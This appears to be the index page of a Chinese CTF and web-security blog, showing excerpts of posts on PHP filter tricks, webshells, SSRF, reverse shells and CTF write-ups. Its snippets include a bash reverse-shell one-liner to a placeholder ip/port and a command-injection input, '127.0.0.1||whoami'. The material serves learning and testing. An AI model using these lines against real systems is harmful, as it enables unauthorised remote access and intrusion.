Loading...
php://filter一些奇技淫巧原理php://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)...
参数注入漏洞与两个函数<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERV...
PHP伪随机数zOHF0Cxp49 // GWCTF 2019 枯燥的抽奖 <?php #这不是抽奖程序的源代码!不许看! header("...
无字母数字的webshell最近刚学了一些命令执行的绕过技巧,但是昨天做安恒的八月赛,看到一个魔改的命令执行,看了y1ng的带佬的脚本之后也不是很明白,所...
SSRF漏洞填坑笔记自打写了标题,到现在都没去学习,直到做了一个相关题,才想起来回过神来好好的学习一下。SSRF(Server-Side Request ...
DC-4例行扫ip和端口root@kali:~# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0...
反弹shell的各种姿势bash# 法一: bash -i >& /dev/tcp/ip/port 0>&1 # 法二: /b...
常见的Web源码泄漏漏洞及其利用1、git 源码泄露Git是一个开源的分布式版本控制系统,在执行git init初始化目录的时候,会在当前目录下自动创建一...
[GXYCTF2019]Ping Ping Ping开始就给了/?ip=的提示,有点像DVWA里的命令执行。尝试127.0.0.1||whoami得到正向...
[强网杯 2019]高明的黑客这个题乍一看,以为是个代码审计,其实是个考察脚本编写能力的。网站赫然写着雁过留声,人过留名,此网站已被黑 我也是很佩服你们公...
[Bugku] INSERT INTO注入最近要复习基础,又回顾了一把sqli-labs结果发现还是有一些奇技淫巧没有收录进去,正好想起来bugku上有一...
[HCTF 2018]admin打开的主页面就是一个普普通通平淡无奇的欢迎页面查看源代码也只是看到了一句<!-- you are not admin...